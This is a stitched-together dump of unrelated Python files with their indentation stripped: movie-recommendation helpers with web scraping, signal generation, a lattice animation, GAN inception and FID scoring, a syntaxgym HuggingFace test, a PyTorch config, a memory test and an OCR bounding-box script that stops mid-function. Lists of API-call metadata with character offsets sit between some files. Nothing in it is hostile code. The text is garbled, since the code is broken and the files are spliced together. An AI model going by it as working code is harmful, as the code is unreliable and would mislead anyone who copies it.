from bs4 import BeautifulSoup
import requests
#r_df = pd.read_csv('./data/ratings.csv', sep=',', index_col=[1]) # read in from hard-drive
#movies = pd.read_csv('./data/movies.csv', sep=',', index_col=[0]) # read in from hard-drive
#top_df = pd.read_csv('./data/top_df.csv', sep=',', index_col=[0])
#l_df = pd.read_csv('./data/links.csv', sep=',', index_col=0)
#print(movies.head())
def get_top_match(movie_title, movie_list):
#movieId,title,genres
match = process.extract(movie_title,movie_list, limit=3)
return match
def create_user_vector_with_title(movie_dict, movies):
"""
convert dict of user_ratings to a user_vector
"""
# generate the user vector
user_vector = pd.Series(np.nan, index=movies['title'])
user_vector[movie_dict.keys()] = movie_dict.values()
return user_vector
def clean_and_pivot_r_df(r_df, k=10):
r_df= r_df.drop(columns=['timestamp'])
r_df = r_df.pivot(columns='userId', values='rating')
r_df = r_df[r_df.notna().sum(axis=1)>k] #selecting only movies that have more than 10 rates
return r_df
def sort_r_df(r_df):
'''r_df is dataframe, usuallu the one processed by clean_and_pivot_r_df
returns r_df sorted by descending average rating'''
rating_ave = np.nanmean(r_df.values, axis=1) #row average (on the movies Id) for each user
r_df['ave_rating'] = pd.Series(rating_ave, index=r_df.index)
r_df_sorted = r_df.sort_values('ave_rating', ascending=False)
r_df_sorted.drop(columns=['ave_rating'], inplace=True)
return r_df_sorted
def get_user_vector_df(user_vector):
'''user_vector is a dict. key:movieID, value:ratings
Transform the user_vector in df'''
user_vector = pd.DataFrame(list(user_vector.values()), index=list(user_vector.keys()))
user_vector.columns=['rating']
return user_vector
def fill_user_vector_df(user_vector_df, top):
'''user_vector_df is the df of user_vector
Fills the df with ave_ratings'''
user_vector_filled = user_vector_df.loc[top.index]['rating'].fillna(top.loc[top.index]['ave_rating'])
user_vector_filled = pd.DataFrame(user_vector_filled).T
return user_vector_filled
def recommend_movies(prediction_df, user_vector_df):
'''prediction_df is a dataFrame with a prediction matrix made by a whatever model
user_vector_df is the df version of a user_vector (result of get_user_vector_df)
Returns a list of recommended movieIds'''
bool_mask_df = user_vector_df.isnull()
not_rated = prediction_df.columns[bool_mask_df['rating']]
#movies to recommend
movies_to_recommend = prediction_df[not_rated]
movies_to_recommend = movies_to_recommend.T
movies_to_recommend.columns = ['predicted_rating']
movies_to_recommend = movies_to_recommend.sort_values(by='predicted_rating', ascending=False)
recommended_moviesId = list(movies_to_recommend.index)
return recommended_moviesId
def create_user_vector(user_rating, top_tit_gen):
'''user_rating is the output of web application --> dict {'titanic':4,'orange':5,...}
top_tit_gen is a dataframe with videoId as index and title, genre as columns.
user_item_matrix is a dataframe of size (n_users x n_videos).
The function returns a dict: key is movieId and value is rating (Nan or a int)'''
movies_list = list(top_tit_gen.index)#list(user_item_matrix.columns)
empty_list = [np.nan] * len(movies_list)
ratings_dict = dict(zip(movies_list, empty_list))
for key, value in user_rating.items():
#title, similarity_score, movie_id = process.extract()
res = process.extract(key, top_tit_gen['title'],limit=1)
for r in res:
ratings_dict[r[2]] = value
return ratings_dict
def lookup_movieId(top, movieId):
'''top is the top_tit_gen df (n_movies x 3) --. cols: ave_rating, title, genre
movieId is a movie Id,
Returns the title of movie associated to movieId'''
title = list(top.loc[top.index == movieId]['title'])[0]
return title
def format_imdbId(imdbId):
'''imdbId is a int. Returns a str'''
imdbId = str(imdbId)
len_id = len(imdbId)
diff = 7 - len_id
for i in range(diff):
imdbId = '0'+imdbId
return imdbId
def get_imdbId(l_df, movie_id):
return l_df.loc[l_df.index == movie_id]['imdbId'].values[0]
def get_html_text(url):
resp = requests.get(url)
html = resp.text
soup = BeautifulSoup(html, features='html.parser')
return soup
def get_src(soup):
tag = soup.find('img')
src = tag.get('src')
return src
def get_href(soup):
tag = soup.find("a", {"class": "slate_button prevent-ad-overlay video-modal"})
href = tag.get('href')
return href
| [
"pandas.DataFrame",
"pandas.Series",
"requests.get",
"bs4.BeautifulSoup",
"fuzzywuzzy.process.extract",
"numpy.nanmean"
] | [((886, 935), 'fuzzywuzzy.process.extract', 'process.extract', (['movie_title', 'movie_list'], {'limit': '(3)'}), '(movie_title, movie_list, limit=3)\n', (901, 935), False, 'from fuzzywuzzy import process\n'), ((1128, 1168), 'pandas.Series', 'pd.Series', (['np.nan'], {'index': "movies['title']"}), "(np.nan, index=movies['title'])\n", (1137, 1168), True, 'import pandas as pd\n'), ((1678, 1709), 'numpy.nanmean', 'np.nanmean', (['r_df.values'], {'axis': '(1)'}), '(r_df.values, axis=1)\n', (1688, 1709), True, 'import numpy as np\n'), ((1781, 1820), 'pandas.Series', 'pd.Series', (['rating_ave'], {'index': 'r_df.index'}), '(rating_ave, index=r_df.index)\n', (1790, 1820), True, 'import pandas as pd\n'), ((4789, 4806), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (4801, 4806), False, 'import requests\n'), ((4839, 4882), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html'], {'features': '"""html.parser"""'}), "(html, features='html.parser')\n", (4852, 4882), False, 'from bs4 import BeautifulSoup\n'), ((2528, 2560), 'pandas.DataFrame', 'pd.DataFrame', (['user_vector_filled'], {}), '(user_vector_filled)\n', (2540, 2560), True, 'import pandas as pd\n'), ((4022, 4073), 'fuzzywuzzy.process.extract', 'process.extract', (['key', "top_tit_gen['title']"], {'limit': '(1)'}), "(key, top_tit_gen['title'], limit=1)\n", (4037, 4073), False, 'from fuzzywuzzy import process\n')] |
import math
import numpy as np
def complexSignal(f1, f2, a1, a2, data_points = 3000, dT = 0.01,noisy = True,
mean = 0, std = 10,separate_signals = False):
if noisy:
noise = np.random.normal(mean, std, size=data_points)
else:
noise = np.zeros(shape=(data_points))
tremor1 = []
tremor2 = []
frequencies = np.zeros(shape=(2, data_points))
t = 0
for i in range(data_points):
t += dT
tremor1.append(a1*math.sin(2 * math.pi * f1 * t))
tremor2.append(a2* math.cos(2 * math.pi * f2 * t))
if a1 > a2:
frequencies[0][i] = f1
frequencies[1][i] = f2
else:
frequencies[0][i] = f2
frequencies[1][i] = f1
if separate_signals:
return tremor1, tremor2, noise
else:
return np.array(tremor1) + np.array(tremor2) + noise, frequencies | [
"numpy.zeros",
"math.sin",
"numpy.array",
"math.cos",
"numpy.random.normal"
] | [((373, 405), 'numpy.zeros', 'np.zeros', ([], {'shape': '(2, data_points)'}), '(shape=(2, data_points))\n', (381, 405), True, 'import numpy as np\n'), ((209, 254), 'numpy.random.normal', 'np.random.normal', (['mean', 'std'], {'size': 'data_points'}), '(mean, std, size=data_points)\n', (225, 254), True, 'import numpy as np\n'), ((281, 308), 'numpy.zeros', 'np.zeros', ([], {'shape': 'data_points'}), '(shape=data_points)\n', (289, 308), True, 'import numpy as np\n'), ((493, 523), 'math.sin', 'math.sin', (['(2 * math.pi * f1 * t)'], {}), '(2 * math.pi * f1 * t)\n', (501, 523), False, 'import math\n'), ((552, 582), 'math.cos', 'math.cos', (['(2 * math.pi * f2 * t)'], {}), '(2 * math.pi * f2 * t)\n', (560, 582), False, 'import math\n'), ((847, 864), 'numpy.array', 'np.array', (['tremor1'], {}), '(tremor1)\n', (855, 864), True, 'import numpy as np\n'), ((867, 884), 'numpy.array', 'np.array', (['tremor2'], {}), '(tremor2)\n', (875, 884), True, 'import numpy as np\n')] |
import cv2
import numpy as np
from math import sqrt, log, pi, sin, cos, floor
def populate_canvas(canvas, A, b):
B = np.array([[1, cos(pi/3.)], [0, sin(pi/3.)]])
T = np.linalg.inv(B)
B1 = B[:,0]
B2 = B[:,1]
for i in range(canvas.shape[0]):
y = (i*1./canvas.shape[0] - 0.5) * -H
for j in range(canvas.shape[1]):
x = (j*1./canvas.shape[1] - .5) * W
xy = np.array([[x],[y]])
xy = np.dot(A, xy) + b
uv = np.dot(T, xy)
u = uv[0,0]
v = uv[1,0]
r = u - floor(u)
s = v - floor(v)
P = np.array([0, 0]) if r < 1 - s else B1 + B2
Q = B1
R = B2
C = (P + Q + R)/3
rxy = B1 * r + B2 * s
d = sqrt(np.dot(rxy - C, rxy - C))
canvas[i,j,:] = 255 * (2 - d)
W = 5.
H = 5.
frame = 0
N = 9
canvas = np.zeros((400, 400, 3), dtype=np.uint8)
for i in range(N+1):
theta = pi / 3 * i / N
A = np.array([[cos(theta), -sin(theta)], [sin(theta), cos(theta)]])
b = np.array([[0],[0]])
populate_canvas(canvas, A, b)
cv2.imwrite(f"tanimation{frame}.png", canvas)
frame += 1
N = 6
for i in range(N+1):
theta = 0
A = np.array([[cos(theta), -sin(theta)], [sin(theta), cos(theta)]])
b = np.array([[-cos(pi/3)],[-sin(pi/3)]]) * i/N
populate_canvas(canvas, A, b)
cv2.imwrite(f"tanimation{frame}.png", canvas)
frame += 1
| [
"cv2.imwrite",
"numpy.zeros",
"math.floor",
"math.sin",
"numpy.array",
"numpy.linalg.inv",
"math.cos",
"numpy.dot"
] | [((896, 935), 'numpy.zeros', 'np.zeros', (['(400, 400, 3)'], {'dtype': 'np.uint8'}), '((400, 400, 3), dtype=np.uint8)\n', (904, 935), True, 'import numpy as np\n'), ((175, 191), 'numpy.linalg.inv', 'np.linalg.inv', (['B'], {}), '(B)\n', (188, 191), True, 'import numpy as np\n'), ((1064, 1084), 'numpy.array', 'np.array', (['[[0], [0]]'], {}), '([[0], [0]])\n', (1072, 1084), True, 'import numpy as np\n'), ((1122, 1167), 'cv2.imwrite', 'cv2.imwrite', (['f"""tanimation{frame}.png"""', 'canvas'], {}), "(f'tanimation{frame}.png', canvas)\n", (1133, 1167), False, 'import cv2\n'), ((1387, 1432), 'cv2.imwrite', 'cv2.imwrite', (['f"""tanimation{frame}.png"""', 'canvas'], {}), "(f'tanimation{frame}.png', canvas)\n", (1398, 1432), False, 'import cv2\n'), ((413, 433), 'numpy.array', 'np.array', (['[[x], [y]]'], {}), '([[x], [y]])\n', (421, 433), True, 'import numpy as np\n'), ((485, 498), 'numpy.dot', 'np.dot', (['T', 'xy'], {}), '(T, xy)\n', (491, 498), True, 'import numpy as np\n'), ((136, 149), 'math.cos', 'cos', (['(pi / 3.0)'], {}), '(pi / 3.0)\n', (139, 149), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((153, 166), 'math.sin', 'sin', (['(pi / 3.0)'], {}), '(pi / 3.0)\n', (156, 166), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((450, 463), 'numpy.dot', 'np.dot', (['A', 'xy'], {}), '(A, xy)\n', (456, 463), True, 'import numpy as np\n'), ((567, 575), 'math.floor', 'floor', (['u'], {}), '(u)\n', (572, 575), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((596, 604), 'math.floor', 'floor', (['v'], {}), '(v)\n', (601, 604), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((621, 637), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (629, 637), True, 'import numpy as np\n'), ((787, 811), 'numpy.dot', 'np.dot', (['(rxy - C)', '(rxy - C)'], {}), '(rxy - C, rxy - C)\n', (793, 811), True, 'import numpy as np\n'), ((1003, 1013), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1006, 1013), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1030, 1040), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1033, 1040), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1042, 1052), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1045, 1052), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1244, 1254), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1247, 1254), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1271, 1281), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1274, 1281), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1283, 1293), 'math.cos', 'cos', (['theta'], {}), '(theta)\n', (1286, 1293), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1016, 1026), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1019, 1026), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1257, 1267), 'math.sin', 'sin', (['theta'], {}), '(theta)\n', (1260, 1267), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1317, 1328), 'math.cos', 'cos', (['(pi / 3)'], {}), '(pi / 3)\n', (1320, 1328), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((1330, 1341), 'math.sin', 'sin', (['(pi / 3)'], {}), '(pi / 3)\n', (1333, 1341), False, 'from math import sqrt, log, pi, sin, cos, floor\n')] |
import numpy as np
import torch
import tensorflow as tf
# from tflib.inception_score import get_inception_score
from .inception_tf13 import get_inception_score
import tflib.fid as fid
BATCH_SIZE = 100
N_CHANNEL = 3
RESOLUTION = 64
NUM_SAMPLES = 50000
def cal_inception_score(G, device, z_dim):
all_samples = []
samples = torch.randn(NUM_SAMPLES, z_dim)
for i in range(0, NUM_SAMPLES, BATCH_SIZE):
samples_100 = samples[i:i + BATCH_SIZE]
samples_100 = samples_100.to(device=device)
all_samples.append(G(samples_100).cpu().data.numpy())
all_samples = np.concatenate(all_samples, axis=0)
all_samples = np.multiply(np.add(np.multiply(all_samples, 0.5), 0.5), 255).astype('int32')
all_samples = all_samples.reshape((-1, N_CHANNEL, RESOLUTION, RESOLUTION)) #.transpose(0, 2, 3, 1)
return get_inception_score(all_samples)
def cal_inception_score_o(G, device, z_dim):
all_samples = []
samples = torch.randn(NUM_SAMPLES, z_dim)
for i in range(0, NUM_SAMPLES, BATCH_SIZE):
samples_100 = samples[i:i + BATCH_SIZE]
samples_100 = samples_100.to(device=device)
all_samples.append(G(samples_100).cpu().data.numpy())
all_samples = np.concatenate(all_samples, axis=0)
all_samples = np.multiply(np.add(np.multiply(all_samples, 0.5), 0.5), 255).astype('int32')
all_samples = all_samples.reshape((-1, N_CHANNEL, RESOLUTION, RESOLUTION)) #.transpose(0, 2, 3, 1)
return get_inception_score(list(all_samples))
def cal_fid_score(G, device, z_dim):
stats_path = 'tflib/data/fid_stats_lsun_train.npz'
inception_path = fid.check_or_download_inception('tflib/model')
f = np.load(stats_path)
mu_real, sigma_real = f['mu'][:], f['sigma'][:]
f.close()
fid.create_inception_graph(inception_path)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
all_samples = []
samples = torch.randn(NUM_SAMPLES, z_dim, 1, 1)
for i in range(0, NUM_SAMPLES, BATCH_SIZE):
samples_100 = samples[i:i + BATCH_SIZE]
samples_100 = samples_100.to(device=device)
all_samples.append(G(samples_100).cpu().data.numpy())
all_samples = np.concatenate(all_samples, axis=0)
all_samples = np.multiply(np.add(np.multiply(all_samples, 0.5), 0.5), 255).astype('int32')
all_samples = all_samples.reshape((-1, N_CHANNEL, RESOLUTION, RESOLUTION)).transpose(0, 2, 3, 1)
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
mu_gen, sigma_gen = fid.calculate_activation_statistics(all_samples, sess, batch_size=BATCH_SIZE)
fid_value = fid.calculate_frechet_distance(mu_gen, sigma_gen, mu_real, sigma_real)
return fid_value
| [
"tflib.fid.check_or_download_inception",
"numpy.load",
"numpy.multiply",
"tflib.fid.calculate_activation_statistics",
"tensorflow.global_variables_initializer",
"tflib.fid.calculate_frechet_distance",
"tensorflow.Session",
"torch.randn",
"tensorflow.ConfigProto",
"tflib.fid.create_inception_graph"... | [((332, 363), 'torch.randn', 'torch.randn', (['NUM_SAMPLES', 'z_dim'], {}), '(NUM_SAMPLES, z_dim)\n', (343, 363), False, 'import torch\n'), ((593, 628), 'numpy.concatenate', 'np.concatenate', (['all_samples'], {'axis': '(0)'}), '(all_samples, axis=0)\n', (607, 628), True, 'import numpy as np\n'), ((953, 984), 'torch.randn', 'torch.randn', (['NUM_SAMPLES', 'z_dim'], {}), '(NUM_SAMPLES, z_dim)\n', (964, 984), False, 'import torch\n'), ((1214, 1249), 'numpy.concatenate', 'np.concatenate', (['all_samples'], {'axis': '(0)'}), '(all_samples, axis=0)\n', (1228, 1249), True, 'import numpy as np\n'), ((1613, 1659), 'tflib.fid.check_or_download_inception', 'fid.check_or_download_inception', (['"""tflib/model"""'], {}), "('tflib/model')\n", (1644, 1659), True, 'import tflib.fid as fid\n'), ((1668, 1687), 'numpy.load', 'np.load', (['stats_path'], {}), '(stats_path)\n', (1675, 1687), True, 'import numpy as np\n'), ((1758, 1800), 'tflib.fid.create_inception_graph', 'fid.create_inception_graph', (['inception_path'], {}), '(inception_path)\n', (1784, 1800), True, 'import tflib.fid as fid\n'), ((1814, 1830), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (1828, 1830), True, 'import tensorflow as tf\n'), ((1910, 1947), 'torch.randn', 'torch.randn', (['NUM_SAMPLES', 'z_dim', '(1)', '(1)'], {}), '(NUM_SAMPLES, z_dim, 1, 1)\n', (1921, 1947), False, 'import torch\n'), ((2177, 2212), 'numpy.concatenate', 'np.concatenate', (['all_samples'], {'axis': '(0)'}), '(all_samples, axis=0)\n', (2191, 2212), True, 'import numpy as np\n'), ((2629, 2699), 'tflib.fid.calculate_frechet_distance', 'fid.calculate_frechet_distance', (['mu_gen', 'sigma_gen', 'mu_real', 'sigma_real'], {}), '(mu_gen, sigma_gen, mu_real, sigma_real)\n', (2659, 2699), True, 'import tflib.fid as fid\n'), ((2419, 2444), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (2429, 2444), True, 'import tensorflow as tf\n'), ((2534, 2611), 'tflib.fid.calculate_activation_statistics', 'fid.calculate_activation_statistics', (['all_samples', 'sess'], {'batch_size': 'BATCH_SIZE'}), '(all_samples, sess, batch_size=BATCH_SIZE)\n', (2569, 2611), True, 'import tflib.fid as fid\n'), ((2471, 2504), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (2502, 2504), True, 'import tensorflow as tf\n'), ((666, 695), 'numpy.multiply', 'np.multiply', (['all_samples', '(0.5)'], {}), '(all_samples, 0.5)\n', (677, 695), True, 'import numpy as np\n'), ((1287, 1316), 'numpy.multiply', 'np.multiply', (['all_samples', '(0.5)'], {}), '(all_samples, 0.5)\n', (1298, 1316), True, 'import numpy as np\n'), ((2250, 2279), 'numpy.multiply', 'np.multiply', (['all_samples', '(0.5)'], {}), '(all_samples, 0.5)\n', (2261, 2279), True, 'import numpy as np\n')] |
"""
Test support for HuggingFace models.
"""
import numpy as np
import pytest
import lm_zoo as Z
from syntaxgym import compute_surprisals, evaluate
from syntaxgym.suite import Suite
zoo = Z.get_registry()
def huggingface_model_fixture(request):
"""
Defines a generic HF model fixture to be parameterized in a few different
ways
"""
model_ref = request.param
model = zoo[f"huggingface://{model_ref}"]
return model
huggingface_model_word_refs = [
"hf-internal-testing/tiny-random-transfo-xl"
]
"""Word-level tokenization HF models"""
huggingface_model_subword_refs = [
"hf-internal-testing/tiny-xlm-roberta"
]
"""Subword-tokenization HF models"""
huggingface_model = pytest.fixture(
huggingface_model_fixture,
scope="module",
params=huggingface_model_word_refs + huggingface_model_subword_refs)
def test_hf_deterministic(dummy_suite_json, huggingface_model):
"""
Test that suite evaluations are deterministic across multiple invocations.
"""
suite = Suite.from_dict(dummy_suite_json)
surps_df = compute_surprisals(huggingface_model, suite)
# Again!
surps_df2 = compute_surprisals(huggingface_model, suite)
for i1, i2 in zip(surps_df.items, surps_df2.items):
for c1, c2 in zip(i1["conditions"], i2["conditions"]):
for r1, r2 in zip(c1["regions"], c2["regions"]):
np.testing.assert_almost_equal(r1["metric_value"]["sum"],
r2["metric_value"]["sum"])
| [
"syntaxgym.compute_surprisals",
"numpy.testing.assert_almost_equal",
"pytest.fixture",
"lm_zoo.get_registry",
"syntaxgym.suite.Suite.from_dict"
] | [((192, 208), 'lm_zoo.get_registry', 'Z.get_registry', ([], {}), '()\n', (206, 208), True, 'import lm_zoo as Z\n'), ((713, 844), 'pytest.fixture', 'pytest.fixture', (['huggingface_model_fixture'], {'scope': '"""module"""', 'params': '(huggingface_model_word_refs + huggingface_model_subword_refs)'}), "(huggingface_model_fixture, scope='module', params=\n huggingface_model_word_refs + huggingface_model_subword_refs)\n", (727, 844), False, 'import pytest\n'), ((1027, 1060), 'syntaxgym.suite.Suite.from_dict', 'Suite.from_dict', (['dummy_suite_json'], {}), '(dummy_suite_json)\n', (1042, 1060), False, 'from syntaxgym.suite import Suite\n'), ((1076, 1120), 'syntaxgym.compute_surprisals', 'compute_surprisals', (['huggingface_model', 'suite'], {}), '(huggingface_model, suite)\n', (1094, 1120), False, 'from syntaxgym import compute_surprisals, evaluate\n'), ((1151, 1195), 'syntaxgym.compute_surprisals', 'compute_surprisals', (['huggingface_model', 'suite'], {}), '(huggingface_model, suite)\n', (1169, 1195), False, 'from syntaxgym import compute_surprisals, evaluate\n'), ((1393, 1482), 'numpy.testing.assert_almost_equal', 'np.testing.assert_almost_equal', (["r1['metric_value']['sum']", "r2['metric_value']['sum']"], {}), "(r1['metric_value']['sum'], r2['metric_value'\n ]['sum'])\n", (1423, 1482), True, 'import numpy as np\n')] |
import numpy as np
import torch
import torch.nn as nn
import src.net as net
def get_device():
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
print('Device State:', device)
return device
class DL_Config(object):
def __init__(self) -> None:
self.basic_config()
self.net_config()
self.performance_config()
self.save_config()
def basic_config(self):
self.SEED: int = 24
self.NUM_EPOCH: int = 1000
self.BATCH_SIZE: int = 512
self.earlyStop: int or None = None
np.random.seed(self.SEED)
torch.manual_seed(self.SEED)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(self.SEED)
def net_config(self):
self.isClassified = False
self.net = net.Net04(93).to(get_device())
self.loss_func = nn.MSELoss(reduction='mean')
self.optimizer = torch.optim.SGD(self.net.parameters(), lr=1e-4, momentum=0.9)
self.min_MES = 1000.0
def performance_config(self):
self.printPerformance: bool = True
self.showPlot: bool = True
self.savePerformance: bool = True
self.savePlot: bool = True
def save_config(self):
self.saveDir = './out/test/'
self.saveModel = True
self.checkpoint = 0
self.bestModelSave = True
self.onlyParameters = True
| [
"src.net.Net04",
"torch.nn.MSELoss",
"numpy.random.seed",
"torch.manual_seed",
"torch.cuda.manual_seed_all",
"torch.cuda.is_available"
] | [((121, 146), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (144, 146), False, 'import torch\n'), ((565, 590), 'numpy.random.seed', 'np.random.seed', (['self.SEED'], {}), '(self.SEED)\n', (579, 590), True, 'import numpy as np\n'), ((599, 627), 'torch.manual_seed', 'torch.manual_seed', (['self.SEED'], {}), '(self.SEED)\n', (616, 627), False, 'import torch\n'), ((639, 664), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (662, 664), False, 'import torch\n'), ((852, 880), 'torch.nn.MSELoss', 'nn.MSELoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (862, 880), True, 'import torch.nn as nn\n'), ((678, 715), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['self.SEED'], {}), '(self.SEED)\n', (704, 715), False, 'import torch\n'), ((796, 809), 'src.net.Net04', 'net.Net04', (['(93)'], {}), '(93)\n', (805, 809), True, 'import src.net as net\n')] |
if __name__ == '__main__':
import numpy as np
import pandas as pd
import os
print('\n Memory Pressure Test Starts...\n')
for i in os.listdir():
if 'mprofile_' in i:
df = pd.read_csv(i, sep=' ', error_bad_lines=False)
df.columns = ['null', 'memory', 'time']
df.drop('null', 1, inplace=True)
std_limit = 5
highest_limit = 800
std = np.std(np.array(df.memory.values[1500:]))
highest = df.memory.max()
if std > std_limit:
raise Exception('MEMORY TEST FAILED: Standard deviation of memory pressure is %d which is above the %d limit' % (std, std_limit))
if highest > highest_limit:
raise Exception('MEMORY TEST FAILED: Max memory is %d which is above the %d limit' % (highest, highest_limit))
print("\n Memory Pressure Test Passed \n")
| [
"pandas.read_csv",
"numpy.array",
"os.listdir"
] | [((153, 165), 'os.listdir', 'os.listdir', ([], {}), '()\n', (163, 165), False, 'import os\n'), ((403, 436), 'numpy.array', 'np.array', (['df.memory.values[1500:]'], {}), '(df.memory.values[1500:])\n', (411, 436), True, 'import numpy as np\n'), ((213, 259), 'pandas.read_csv', 'pd.read_csv', (['i'], {'sep': '""" """', 'error_bad_lines': '(False)'}), "(i, sep=' ', error_bad_lines=False)\n", (224, 259), True, 'import pandas as pd\n')] |
#!/usr/bin/python3
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import cv2
import pytesseract
import json
import sys
import os
import re
# the setrecursionlimit function is
# used to modify the default recursion
# limit set by python. Using this,
# we can increase the recursion limit
# to satisfy our needs
sys.setrecursionlimit(10**6)
debug = False
newlineChar = False
configJsonPath = "config.json"
if not os.path.isfile(configJsonPath):
raise ValueError("could not find '{}'".format(configJsonPath))
index = 0
while index < len(sys.argv):
arg = sys.argv[index]
if arg[0] == '-':
if arg == '--debug' or arg == '-d':
debug = True
print("Debug is {}".format(debug))
elif arg[0:len("--newline")] == "--newline":
_, value = arg.split('=')
newlineChar = value
elif arg == "-n":
newlineChar = sys.argv[index+1]
index += 1
else:
imagePath = arg
if not os.path.isfile(imagePath):
raise ValueError("image '{}' does not exist".format(imagePath))
index += 1
with open(configJsonPath, 'r') as in_file:
config = json.load(in_file)
pytesseract.pytesseract.tesseract_cmd = config["tesseract"]["path"]
customConfig = config["tesseract"]["options"]
if not newlineChar:
newlineChar = config["newline"]
def debugImage(image, imagePath, imageNumber=1, title=None, grayscale=False):
filepath, extension = os.path.splitext(imagePath)
plt.figure(figsize=(10,10))
if title:
plt.title(title)
if grayscale:
plt.imshow(image, cmap='gray');
else:
plt.imshow(image);
plt.xticks([]);
plt.yticks([])
plt.savefig('{}-{}.png'.format(filepath,imageNumber),bbox_inches='tight')
plt.close()
def findTop(image, x, y, value, visited ):
if y == 0:
return 0
top = y
if value == image[y-1,x]:
visited[y-1,x] = 1
top = min(top, findTop(image, x, y-1, value, visited))
if x < image.shape[1]-1 and visited[y,x+1] == 0:
visited[y,x+1] = 1
if value == image[y, x+1]:
top = min(top, findTop(image, x+1, y, value, visited))
if x > 0 and visited[y,x-1] == 0:
visited[y,x-1] = 1
if value == image[y, x-1]:
top = min(top, findTop(image, x-1, y,value, visited))
if y < image.shape[0] - 1 and visited[y+1,x] == 0:
visited[y+1,x] = 1
if value == image[y+1, x]:
top = min(top, findTop(image, x, y+1, value, visited))
return top
def findLeft(image, x, y, value, visited ):
if x == 0:
return 0
left = x
if value == image[y,x-1]:
visited[y, x-1] = 1
left = min(left, findLeft(image, x-1, y, value, visited))
if y > 0 and visited[y-1,x] == 0:
visited[y-1,x] = 1
if value == image[y-1, x]:
left = min(left, findLeft(image, x, y-1, value, visited))
if y < image.shape[0]-1 and visited[y+1,x] == 0:
visited[y+1,x] = 1
if value == image[y+1, x]:
left = min(left, findLeft(image, x, y+1, value, visited))
if x < image.shape[1]-1 and visited[y,x+1] == 0:
visited[y,x+1] = 1
if value == image[y, x+1]:
left = min(left, findLeft(image, x+1, y, value, visited))
return left
def findBottom(image, x, y, value, visited ):
if y >= image.shape[0]-1:
return image.shape[0]-1
bottom = y
if value == image[y+1,x]:
visited[y+1,x] = 1
bottom = max(bottom, findBottom(image, x, y+1, value, visited))
if x < image.shape[1]-1 and visited[y,x+1] == 0:
visited[y,x+1] = 1
if value == image[y, x+1]:
bottom = max(bottom, findBottom(image, x+1, y,value, visited))
if x > 0 and visited[y,x-1] == 0 :
visited[y,x-1] = 1
if value == image[y, x-1]:
bottom = max(bottom, findBottom(image, x-1, y, value, visited))
if y > 0 and visited[y-1,x] == 0:
visited[y-1,x] = 1
if value == image[y-1, x]:
bottom = max(bottom, findBottom(image, x, y-1, value, visited))
return bottom
def findRight(image, x, y, value, visited ):
if x >= image.shape[1]-1:
return image.shape[1]-1
right = x
if value == image[y,x+1]:
visited[y,x+1] = 1
right = max(right, findRight(image, x+1, y, value, visited))
if y > 0 and visited[y-1,x] == 0:
visited[y-1,x] = 1
if value == image[y-1, x]:
# print("RIGHT, GO UP {} {} {} {}".format(x,y, image.shape[0], right))
right = max(right, findRight(image, x, y-1, value, visited))
if y < image.shape[0]-1 and visited[y+1,x] == 0:
visited[y+1,x] = 1
if value == image[y+1, x]:
# print("RIGHT, GO DOWN {} {} {}".format(x,y, image.shape[0]))
right = max(right, findRight(image, x, y+1, value, visited))
if x > 0 and visited[y,x-1] == 0:
visited[y,x-1] = 1
if value == image[y, x-1]:
right = max(right, findRight(image, x-1, y, value, visited))
return right
def _getBoundingBoxForPixel(image, x, y, value, visited):
top = findTop(image, x, y, value, visited)
visited = np.zeros(image.shape, dtype=np.int8)
bottom = findBottom(image, x, y, value, visited)
visited = np.zeros(image.shape, dtype=np.int8)
left = findLeft(image, x, y, value, visited)
visited = np.zeros(image.shape, dtype=np.int8)
right = findRight(image, x, y, value, visited)
return {
"width": right - left,
"height": bottom - top,
"top": top,
"bottom": bottom,
"left": left,
"right": right,
"visited": visited
}
def getBoundingBoxForPixel(image, x, y, value):
"""
Given a pixel position we then want to say what the maximum width is that its connected to
and what the maximum height its connected to. This will give us a bounding box for the
pixel.
This is currently subject to local tops e.g. if you are at the bottom left of an S
then it won't be joined to the top of the S.
"""
visited = np.zeros(image.shape, dtype=np.int8)
return _getBoundingBoxForPixel(image, x, y, value, visited)
def setPixelsMovingToTop(image, x, y, oldvalue, newvalue, visited ):
image[y,x] = newvalue
visited[y,x] = 1
if y > 0 and oldvalue == image[y-1,x]:
visited[y-1,x] = 1
setPixelsMovingToTop(image, x, y-1, oldvalue, newvalue, visited)
if x < image.shape[1]-1 and oldvalue == image[y, x+1] and visited[y,x+1] ==0:
visited[y,x+1] = 1
setPixelsMovingToTop(image, x+1, y, oldvalue, newvalue, visited)
if x > 0 and oldvalue == image[y, x-1] and visited[y,x-1] ==0:
visited[y,x-1] = 1
